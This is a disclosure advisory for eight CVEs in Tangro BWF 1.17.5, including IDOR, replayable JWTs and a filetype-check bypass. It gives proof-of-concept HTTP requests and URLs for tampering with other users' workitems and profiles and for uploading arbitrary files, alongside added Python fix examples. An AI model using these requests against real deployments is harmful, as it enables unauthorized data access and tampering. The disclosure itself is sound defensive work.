Advisory: Tangro BWF 1.17.5 Multiple Vulnerabilities

Tangro BWF 1.17.5 is vulnerable to multiple security issues, caused among other things by broken access control and insecure direct object references (IDOR):
  • Adding Attachments to Arbitrary Workitem (CVE-2020-26171)
  • JWT without Expiration (CVE-2020-26172)
  • Unauthenticated PDF Download (CVE-2020-26173)
  • Upload Filetype Constraint Bypass (CVE-2020-26174)
  • Profile Attributes of Other Users Writable (CVE-2020-26175)
  • Unauthorised Listing of Attachments (CVE-2020-26176)
  • Editing Disabled Profile Attributes (CVE-2020-26177)
  • Unauthenticated Download of Workitem Attachments (CVE-2020-26178)

Detailed Security Advisories

Adding Attachments to Arbitrary Workitem (CVE-2020-26171)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26171
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The "documentId" of attachment uploads to "/api/document/attachments/upload" can be manipulated. By doing this, users can add attachments to workitems that do not belong to them.

### Proof of Concept

When uploading an attachment to a document, the upload request specifies a document ID:

```
POST /api/document/attachments/upload HTTP/1.1
Host: <Tangro Host>
Content-Length: 410
X-AUTH-TOKEN: "<TOKEN>"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylayr7DbpEgYZ2lrs

------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="documentId"

100000000000123456
------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="file"; filename="file.txt"
Content-Type: text/plain

test

------WebKitFormBoundarylayr7DbpEgYZ2lrs
Content-Disposition: form-data; name="archiveObject"

/SSC/CSV
------WebKitFormBoundarylayr7DbpEgYZ2lrs--
```

By manipulating the documentId, the file is added to whichever document is specified, regardless of whether that document belongs to the requesting user.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

JWT without Expiration (CVE-2020-26172)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Session Fixation
CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N (Score 4.2)
CWE Reference: CWE-294
CVE Reference: CVE-2020-26172
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

Every login to Tangro generates the same JWT, which allows an attacker who has captured it to reuse it while a session is active. The JWT does not contain an expiration timestamp, which enables an attacker to bypass authentication by capture-replay.

### Proof of Concept

```
Headers = { "typ" : "JWT", "alg" : "HS256" }

Payload = {
"lastName" : "<LastName>",
"firstName" : "<FirstName>", 
"isSapUser" : false, 
"person" : "1234", 
"validPassword" : true, 
"fullName" : "<FullName>", 
"language" : "DE", 
"username" : "<Username>"
}

Signature = "<Signature>"
```
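The fixed behaviour, as an added example that is not Tangro's code: a stdlib-only HS256 issuer and verifier in which every token carries iat and exp, the verifier rejects a missing or past exp and any alg other than HS256, and a small audit helper reports whether an existing token has an expiry claim at all. The signing key, the token lifetime and the helper names are assumptions.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

SECRET = b"constructed-demo-signing-key"  # assumption: the server's HS256 key

def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def encode_segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode("utf-8"))

def issue_token(claims: dict, ttl_seconds: int, now: int) -> str:
    """Sign an HS256 JWT carrying iat and exp. iat differs per login, so two logins
    no longer yield the same token, and a captured token stops working at exp."""
    payload = dict(claims, iat=now, exp=now + ttl_seconds)
    signing_input = encode_segment({"typ": "JWT", "alg": "HS256"}) + "." + encode_segment(payload)
    sig = hmac.new(SECRET, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)

def verify_token(token: str, now: int) -> Optional[dict]:
    """Return the claims only if the signature is valid and exp lies in the future."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        claims = json.loads(b64url_decode(payload_b64))
        signature = b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":  # token never picks the algorithm
        return None
    expected = hmac.new(SECRET, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    if not isinstance(claims, dict) or not isinstance(claims.get("exp"), int) or now >= claims["exp"]:
        return None  # no exp at all (the 1.17.5 payload shape) is treated as expired
    return claims

def has_expiry(token: str) -> bool:
    """Audit helper: does an existing token's payload carry an exp claim?"""
    return "exp" in json.loads(b64url_decode(token.split(".")[1]))
```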

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Unauthenticated PDF Download (CVE-2020-26173)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Incorrect Access Control
CVSSv2 Severity: AV:N/AC:H/Au:N/C:P/I:N/A:N (Score 2.6)
CVSSv3 Severity: AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 3.1)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26173
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

PDF files of invoices are served over the "/api/pdf/<documentID>" API endpoint and secured using an additional token:

https://<Tangro Host>/api/pdf/00000000000000123456?token=<Token>

While requiring the token prevents access to a PDF file without knowledge of its corresponding token, the API endpoint does not verify whether the user requesting the document is logged in.

As a result, knowing the document's ID and token, it is possible to download the PDF without logging in.

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Upload Filetype Constraint Bypass (CVE-2020-26174)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Upload Filetype Constraint Bypass
CVSSv2 Severity: AV:N/AC:L/Au:S/C:C/I:C/A:C (Score 9.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (Score 8.8)
CWE Reference: CWE-434
CVE Reference: CVE-2020-26174
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The Tangro application requests a list of allowed filetypes from the server and restricts uploads to the filetypes contained in this list. However, this restriction is enforced in the browser (client-side) and can easily be circumvented. This allows an attacker to upload any file as an attachment to a workitem. In a worst-case scenario, this vulnerability could lead to remote code execution.

### Proof of Concept

Request:

```
POST /api/document/attachments/upload HTTP/1.1
Host: <Tangro Host>
X-AUTH-TOKEN: "<Token>"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynhbkhkaxOGRUpaZa

------WebKitFormBoundarynhbkhkaxOGRUpaZa
Content-Disposition: form-data; name="documentId"

100000000000123456
------WebKitFormBoundarynhbkhkaxOGRUpaZa
Content-Disposition: form-data; name="file"; filename="unsupportedfiletype.thinking"
Content-Type: text/plain

The content of the file.
------WebKitFormBoundarynhbkhkaxOGRUpaZa
Content-Disposition: form-data; name="archiveObject"

/SSC/CSV
------WebKitFormBoundarynhbkhkaxOGRUpaZa--
```

Server response:

```
HTTP/1.1 200 OK
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Cache-Control: no-cache
Connection: close
Date: Thu, 17 Sep 2020 09:38:48 GMT

XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```
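Server-side enforcement of the allowed-filetype list, as an added example (not the vendor's implementation): the same allowlist the client fetches is checked again for every multipart upload, on the extension, the declared Content-Type and the leading bytes of the content. The allowlist contents, the size cap and the function name are assumptions; checking that documentId belongs to the caller is a separate authorization step not covered here.

```python
import os
from typing import Optional

# Constructed allowlist: the server already hands a list like this to the browser; the
# same list is enforced here on every upload so a modified request cannot bypass it.
# extension -> (expected MIME type, leading magic bytes or None when the type has none)
ALLOWED_TYPES = {
    ".pdf": ("application/pdf", b"%PDF-"),
    ".png": ("image/png", b"\x89PNG\r\n\x1a\n"),
    ".txt": ("text/plain", None),
    ".csv": ("text/csv", None),
}
MAX_UPLOAD_BYTES = 10 * 1024 * 1024  # assumption: 10 MiB cap per attachment

def validate_upload(filename: str, content_type: str, data: bytes) -> Optional[str]:
    """Return None when the multipart 'file' part is acceptable, else the reason it is not.
    Checks run in order: name, extension, declared MIME type, content sniff, size."""
    if not filename or os.path.basename(filename) != filename or filename.startswith("."):
        return "invalid filename"  # path components or hidden files are never stored
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_TYPES:
        shown = ext or "(none)"
        return f"file type '{shown}' is not allowed"
    expected_mime, magic = ALLOWED_TYPES[ext]
    declared = content_type.split(";", 1)[0].strip().lower()
    if declared != expected_mime:
        return f"Content-Type {declared!r} does not match extension {ext}"
    if magic is not None and not data.startswith(magic):
        return "file content does not match its declared type"
    if len(data) > MAX_UPLOAD_BYTES:
        return "file too large"
    return None
```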

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Profile Attributes of Other Users Writable (CVE-2020-26175)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:C/A:N (Score 6.8)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N (Score 6.5)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26175
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

The value of "PERSON" in requests to /api/profile can be manipulated in order to change profile information of other users.

### Proof of Concept

```
POST /api/profile HTTP/1.1 
Host: <Tangro Host>

-- SNIP --
{ 
    "DESCRIPTION":"", 
    "ADDRESS_NAME1":"<Name>",
-- SNIP --
"PERSON":"1234", # By manipulating this ID, it is possible to change the profile information of other users.
"BIRTHDAY":"0000-00-00", "MANDT":"XXX"
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Unauthorised Listing of Attachments (CVE-2020-26176)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:S/C:P/I:N/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26176
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

Access control checks on the "/api/document/<DocumentID>/attachments" API endpoint are either missing or broken.

Knowing a document ID, it is possible to list all the attachments of a workitem, including their respective IDs. This allows an attacker to gather valid attachment IDs for workitems that do not belong to them.

### Proof of Concept

Request:

```
GET /api/document/<DocumentID>/attachments HTTP/1.0 
Host: <Tangro Host>
X-AUTH-TOKEN: "<Token>"
```

Response:

```
HTTP/1.0 200 OK 
Content-Type: application/json; charset=utf-8 
Date: Thu, 17 Sep 2020 11:00:33 GMT

[{"archiveDocumentId":"<AttachmentID>","archiveId":"D1","archiveObject":"/SSC/PDF","creationDate":1594764000000,"name":"","sapBusinessObject":"<SAP ID>","user":""}]
```

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Editing Disabled Profile Attributes (CVE-2020-26177)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Incorrect Access Control
CVSSv2 Severity: AV:N/AC:L/Au:S/C:N/I:P/A:N (Score 4.0)
CVSSv3 Severity: AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (Score 4.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26177
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

A user's profile contains some items that are greyed out and thus not intended to be edited by regular users. However, this restriction is only applied client-side.
Manipulating any of the greyed-out values in requests to "/api/profile" is not prohibited server-side.
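One way the server can enforce both profile rules (CVE-2020-26175 above and CVE-2020-26177 in this section), as an added example rather than Tangro's code: the record to update is selected from the authenticated session, a PERSON value that disagrees with the session is refused, and greyed-out attributes may be echoed back unchanged but never altered. The attribute lists, the handler name and the in-memory profile store are assumptions.

```python
from typing import Dict

# Constructed lists: which /api/profile attributes a user may edit and which the UI
# greys out. The server enforces both; the greyed-out ones are read-only here too.
EDITABLE = {"DESCRIPTION", "ADDRESS_NAME1", "ADDRESS_NAME2", "PHONE", "EMAIL"}
READ_ONLY = {"PERSON", "MANDT", "BIRTHDAY"}

class Forbidden(Exception):
    """Raised instead of silently fixing up the request, so attempts show in the logs."""

def apply_profile_update(session_person: str, body: Dict[str, str],
                         profiles: Dict[str, Dict[str, str]]) -> Dict[str, str]:
    """Handle POST /api/profile. The record to update is chosen by the authenticated
    session, never by the PERSON value the client sends (CVE-2020-26175)."""
    record = profiles[session_person]
    if body.get("PERSON", session_person) != session_person:
        raise Forbidden("PERSON in body does not match the authenticated user")
    unknown = set(body) - EDITABLE - READ_ONLY
    if unknown:
        raise Forbidden(f"unknown attributes: {sorted(unknown)}")
    # The client may echo read-only values back unchanged (the UI does exactly that),
    # but any change to them is refused server-side (CVE-2020-26177).
    echoed = (READ_ONLY - {"PERSON"}) & set(body)
    changed = sorted(k for k in echoed if body[k] != record.get(k))
    if changed:
        raise Forbidden(f"read-only attributes cannot be changed: {changed}")
    for key in EDITABLE & set(body):
        record[key] = body[key]
    return record
```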

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Unauthenticated Download of Workitem Attachments (CVE-2020-26178)

Product: Tangro BWF
Vendor: tangro software components GmbH (Heidelberg, Germany)
Tested Version: 1.17.5
Fixed Version: 1.18.1
Vulnerability Type: Insecure Direct Object Reference
CVSSv2 Severity: AV:N/AC:L/Au:N/C:P/I:N/A:N (Score 5.0)
CVSSv3 Severity: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (Score 5.3)
CWE Reference: CWE-639
CVE Reference: CVE-2020-26178
Authors: Dimitri Lesy & Tobias Györfi, Thinking Objects GmbH

### Overview

Knowing an attachment ID, it is possible to download workitem attachments without being authenticated.

### Proof of Concept

https://<Tangro Host>/api/document/attachment/<AttachmentID>?archiveName=D1&fileType=/SSC/PDF
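An authorization layer covering the object-reference findings that share one root cause (CVE-2020-26171, CVE-2020-26173, CVE-2020-26176 and this one), as an added example that is not the vendor's code: every access to a workitem, to its attachment list or to an attachment requires an authenticated session and ownership of the workitem, and the PDF link token is checked in addition to that, with a constant-time comparison, never instead of it. The HMAC-derived token design, the ownership tables and the function names are assumptions.

```python
import hashlib
import hmac
from typing import Dict, Optional

PDF_TOKEN_KEY = b"constructed-demo-key"  # assumption: secret for per-document PDF link tokens

class Denied(Exception):
    """Map to HTTP 401 (no session) or 403/404 (not the caller's workitem)."""

# Constructed ownership data standing in for the application's database.
DOCUMENT_OWNER: Dict[str, str] = {"100000000000123456": "1234", "100000000000654321": "5678"}
ATTACHMENT_DOCUMENT: Dict[str, str] = {"att-0001": "100000000000123456", "att-0002": "100000000000654321"}

def pdf_token(document_id: str) -> str:
    """Per-document link token as assumed here: an HMAC over the document ID."""
    return hmac.new(PDF_TOKEN_KEY, document_id.encode("ascii"), hashlib.sha256).hexdigest()

def require_document_access(session_person: Optional[str], document_id: str) -> str:
    """Session first, then ownership. Guards the upload's documentId (CVE-2020-26171),
    /api/document/<id>/attachments (CVE-2020-26176) and, via authorize_attachment, downloads."""
    if session_person is None:
        raise Denied("authentication required")
    if DOCUMENT_OWNER.get(document_id) != session_person:
        # Same answer for unknown and foreign IDs, so the endpoint cannot be used to enumerate.
        raise Denied("workitem not accessible")
    return document_id

def authorize_attachment(session_person: Optional[str], attachment_id: str) -> str:
    """/api/document/attachment/<AttachmentID> (CVE-2020-26178): resolve the attachment
    to its workitem and apply the workitem check; an unknown ID is refused the same way."""
    document_id = ATTACHMENT_DOCUMENT.get(attachment_id)
    if document_id is None:
        raise Denied("attachment not accessible")
    return require_document_access(session_person, document_id)

def authorize_pdf(session_person: Optional[str], document_id: str, token: Optional[str]) -> str:
    """/api/pdf/<documentID>?token=... (CVE-2020-26173): the link token is checked in
    addition to session and ownership, never as a substitute for them."""
    require_document_access(session_person, document_id)
    if not hmac.compare_digest(pdf_token(document_id), token or ""):
        raise Denied("invalid document token")
    return document_id
```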

### Remediation

In order to remediate this vulnerability, the Tangro BWF software update 1.18.1 must be installed.

Disclosure Timeline

2020-09-17: Vulnerability discovered
2020-10-01: Vulnerability reported to vendor
2020-10-01: Vendor responded immediately
2020-10-21: Vulnerability fix implemented, software update enters QA
2020-11-04: Vulnerability fixed, software update 1.18.1 released
2020-12-17: Vulnerability disclosed

References

[1] Advisory URL: https://blog.to.com/advisory-tangro-bwf-1-17-5-multiple-vulnerabilities
[2] Tangro Website: https://www.tangro.de/

Disclaimer

The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on https://blog.to.com.

Copyright: Creative Commons – Attribution (by) – Version 3.0